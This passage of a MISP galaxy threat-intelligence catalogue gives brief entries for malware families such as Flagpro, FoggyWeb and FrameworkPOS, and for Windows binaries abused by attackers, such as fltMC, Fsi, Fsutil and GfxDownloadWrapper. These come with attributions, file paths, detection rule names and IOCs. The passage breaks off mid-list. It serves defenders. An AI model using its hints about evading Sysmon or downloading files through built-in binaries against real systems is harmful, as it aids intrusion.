tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'f1ad9eba-f4fd-4aec-92c0-833ac14d741b', '5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

Flagpro

Flagpro is a Windows-based, first-stage downloader that has been used by BlackTech since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.[NTT Security Flagpro new December 2021]

Internal MISP references

UUID 977aaf8a-2216-40f0-8682-61dd91638147 which can be used as unique global reference for Flagpro in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0696
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Flame

Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. [Kaspersky Flame]

Internal MISP references

UUID 87604333-638f-4f4a-94e0-16aa825dd5b8 which can be used as unique global reference for Flame in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0143
source MITRE
type ['malware']

FLASHFLOOD

FLASHFLOOD is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. [FireEye APT30]

Internal MISP references

UUID 44a5e62a-6de4-49d2-8f1b-e68ecdf9f332 which can be used as unique global reference for FLASHFLOOD in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0036
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

FlawedAmmyy

FlawedAmmyy is a remote access tool (RAT) that was first seen in early 2016. The code for FlawedAmmyy was based on leaked source code for a version of Ammyy Admin, a remote access software.[Proofpoint TA505 Mar 2018]

Internal MISP references

UUID 308dbe77-3d58-40bb-b0a5-cd00f152dc60 which can be used as unique global reference for FlawedAmmyy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0381
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

FlawedGrace

FlawedGrace is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.[Proofpoint TA505 Jan 2019]

Internal MISP references

UUID c558e948-c817-4494-a95d-ad3207f10e26 which can be used as unique global reference for FlawedGrace in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0383
source MITRE
tags ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

FleetDeck

FleetDeck is a commercial remote monitoring and management (RMM) tool that enables remote desktop access and “virtual terminal” capabilities. Government and commercial reports indicate that financially motivated adversaries, including BlackCat (AKA ALPHV or Noberus) actors and Scattered Spider (AKA 0ktapus or UNC3944), have used FleetDeck for command and control and persistence purposes during intrusions.[Cyber Centre ALPHV/BlackCat July 25 2023][CrowdStrike Scattered Spider SIM Swapping December 22 2022]

Internal MISP references

UUID 68758d3a-ec4b-4c19-933d-b4c3000281b2 which can be used as unique global reference for FleetDeck in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5056
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236']
type ['tool']
Related clusters

To see the related clusters, click here.

FLIPSIDE

FLIPSIDE is a simple tool similar to Plink that is used by FIN5 to maintain access to victims. [Mandiant FIN5 GrrCON Oct 2016]

Internal MISP references

UUID 18002747-ddcc-42c1-b0ca-1e598a9f1919 which can be used as unique global reference for FLIPSIDE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0173
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

fltMC

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Filter Manager Control Program used by Windows

Author: John Lambert

Paths: * C:\Windows\System32\fltMC.exe

Resources: * https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon

Detection: * Sigma: proc_creation_win_fltmc_unload_driver_sysmon.yml * Elastic: defense_evasion_via_filter_manager.toml * Splunk: unload_sysmon_filter_driver.yml * IOC: 4688 events with fltMC.exe[fltMC.exe - LOLBAS Project]

Internal MISP references

UUID 43d57826-cd15-4154-8f04-38351c96986e which can be used as unique global reference for fltMC in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5111
source Tidal Cyber
tags ['49bbb074-2406-4f27-ad77-d2e433ba1ccb', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

FoggyWeb

FoggyWeb is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by APT29 since at least early April 2021.[MSTIC FoggyWeb September 2021]

Internal MISP references

UUID bc11844e-0348-4eed-a48a-0554d68db38c which can be used as unique global reference for FoggyWeb in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0661
source MITRE
tags ['8bf128ad-288b-41bc-904f-093f4fdde745']
type ['malware']
Related clusters

To see the related clusters, click here.

Forfiles

Forfiles is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. [Microsoft Forfiles Aug 2016]

Internal MISP references

UUID c6dc67a6-587d-4700-a7de-bee043a0031a which can be used as unique global reference for Forfiles in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0193
source MITRE
tags ['91804406-e20a-4455-8dbc-5528c35f8e20', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

FrameworkPOS

FrameworkPOS is a point of sale (POS) malware used by FIN6 to steal payment card data from systems that run physical POS devices.[SentinelOne FrameworkPOS September 2019]

Internal MISP references

UUID aef7cbbc-5163-419c-8e4b-3f73bed50474 which can be used as unique global reference for FrameworkPOS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0503
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

FreeFileSync

FreeFileSync is a tool used to facilitate cloud-based file synchronization.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 1d5c5822-3cb4-455a-9976-f6bc17e2820d which can be used as unique global reference for FreeFileSync in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5032
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

FruitFly

FruitFly is designed to spy on Mac users.[objsee mac malware 2017]

Internal MISP references

UUID 3a05085e-5a1f-4a74-b489-d679b80e2c18 which can be used as unique global reference for FruitFly in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0277
source MITRE
type ['malware']

Fsi

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.

Author: Jimmy (@bohops)

Paths: * C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe * C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe

Resources: * https://twitter.com/NickTyrer/status/904273264385589248 * https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/

Detection: * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Fsi.exe execution may be suspicious on non-developer machines * Sigma: proc_creation_win_lolbin_fsharp_interpreters.yml[Fsi.exe - LOLBAS Project]

Internal MISP references

UUID f2a5e6cb-75fd-4108-9466-80471c7d0422 which can be used as unique global reference for Fsi in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5222
source Tidal Cyber
tags ['7a4b56fa-5419-411b-86fe-68c9b0ddd3c5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

FsiAnyCpu

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.

Author: Jimmy (@bohops)

Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe

Resources: * https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/

Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines * Sigma: proc_creation_win_lolbin_fsharp_interpreters.yml[FsiAnyCpu.exe - LOLBAS Project]

Internal MISP references

UUID 9e5c41bb-f4cc-4132-8c7a-4a10a006190b which can be used as unique global reference for FsiAnyCpu in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5223
source Tidal Cyber
tags ['c5d1a687-8a36-4995-b8cb-415f33661821', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Fsutil

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: File System Utility

Author: Elliot Killick

Paths: * C:\Windows\System32\fsutil.exe * C:\Windows\SysWOW64\fsutil.exe

Resources: * https://twitter.com/0gtweet/status/1720724516324704404

Detection: * IOC: fsutil.exe should not be run on a normal workstation * IOC: file setZeroData (not case-sensitive) in the process arguments * IOC: Sysmon Event ID 1 * IOC: Execution of process fsutil.exe with trace decode could be suspicious * IOC: Non-Windows netsh.exe execution * Sigma: proc_creation_win_susp_fsutil_usage.yml[Fsutil.exe - LOLBAS Project]

Internal MISP references

UUID 7a829dae-00cf-4321-95b4-276f7dfb5368 which can be used as unique global reference for Fsutil in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5112
source Tidal Cyber
tags ['76bb7541-94da-4d66-9a57-77f788330287', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

ftp

ftp is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.[Microsoft FTP][Linux FTP]

Internal MISP references

UUID 062deac9-8f05-44e2-b347-96b59ba166ca which can be used as unique global reference for ftp in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0095
source MITRE
tags ['95d37388-4e95-4d7f-96ba-99d94c842299', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '8bf128ad-288b-41bc-904f-093f4fdde745']
type ['tool']
Related clusters

To see the related clusters, click here.

FunnyDream

FunnyDream is a backdoor with multiple components that was used during the FunnyDream campaign since at least 2019, primarily for execution and exfiltration.[Bitdefender FunnyDream Campaign November 2020]

Internal MISP references

UUID d0490e1d-8287-44d3-8342-944d1203b237 which can be used as unique global reference for FunnyDream in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1044
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']

FYAnti

FYAnti is a loader that has been used by menuPass since at least 2020, including to deploy QuasarRAT.[Securelist APT10 March 2021]

Internal MISP references

UUID be9a2ae5-373a-4dee-9c1e-b54235dafed0 which can be used as unique global reference for FYAnti in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0628
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Fysbis

Fysbis is a Linux-based backdoor used by APT28 that dates back to at least 2014.[Fysbis Palo Alto Analysis]

Internal MISP references

UUID 317a7647-aee7-4ce1-a8f8-33a61190f55d which can be used as unique global reference for Fysbis in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0410
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Gazer

Gazer is a backdoor used by Turla since at least 2016. [ESET Gazer Aug 2017]

Internal MISP references

UUID 7a60b984-b0c8-4acc-be24-841f4b652872 which can be used as unique global reference for Gazer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0168
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Gelsemium

Gelsemium is a modular malware comprised of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. Gelsemium has been used by the Gelsemium group since at least 2014.[ESET Gelsemium June 2021]

Internal MISP references

UUID 9a117508-1d22-4fea-aa65-db670c13a5c9 which can be used as unique global reference for Gelsemium in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0666
source MITRE
type ['malware']

GeminiDuke

GeminiDuke is malware that was used by APT29 from 2009 to 2012. [F-Secure The Dukes]

Internal MISP references

UUID 97f32f68-dcd2-4f80-9967-cc87305dc342 which can be used as unique global reference for GeminiDuke in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0049
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Get2

Get2 is a downloader written in C++ that has been used by TA505 to deliver FlawedGrace, FlawedAmmyy, Snatch and SDBbot.[Proofpoint TA505 October 2019]

Internal MISP references

UUID a997aaaf-edfc-4489-80a9-3f8d64545de1 which can be used as unique global reference for Get2 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0460
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

GfxDownloadWrapper

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.

Author: Jesus Galvez

Paths: * c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\ * c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\ * c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\ * c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\ * c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\ * 
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\ * c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\ * c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\ * c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\ * 
c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\ * 
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\ * 
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\ * 
c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\ * c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\ * c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\ * c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\ * c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\ * c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\ * c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\ * c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\ * c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\ * c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\ * c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\ * c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\ * c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\ * c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\ * c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\ * c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\ * c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\ * c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\ * c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\ * c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\ * c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\ * c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\ * c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\ * 
c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\ * c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\ * c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\ * c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\ * c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\ * c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\ * c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\ * c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\ * c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\ * c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\ * c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\ * c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\ * c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\ * c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\ * c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\ * c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\ * 